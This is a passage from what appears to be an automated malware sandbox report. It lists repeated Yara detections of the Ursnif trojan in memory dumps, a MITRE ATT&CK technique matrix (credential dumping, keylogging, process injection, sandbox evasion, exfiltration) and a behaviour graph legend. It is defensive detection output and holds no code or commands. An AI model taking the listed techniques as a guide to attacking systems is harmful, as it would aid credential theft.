            Source: Yara match | File source: 00000003.00000003.500010195.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.1435502688.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.499924506.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.499957979.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500113123.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500143060.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500131153.00000000052D8000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match | File source: 00000003.00000003.500085579.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500051459.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500010195.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.1435502688.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.499924506.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.499957979.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500113123.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500143060.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500131153.00000000052D8000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 121 | Path Interception | Process Injection 1 | Masquerading 1 | OS Credential Dumping | Query Registry 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scripting 121 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 4 | LSASS Memory | Security Software Discovery 24 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | Exploitation for Client Execution 1 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 1 | Security Account Manager | Virtualization/Sandbox Evasion 4 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting 121 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | (none) | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 1 | LSA Secrets | System Information Discovery 125 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | (none) | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | (none) | Abuse Accessibility Features

            Behavior Graph

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet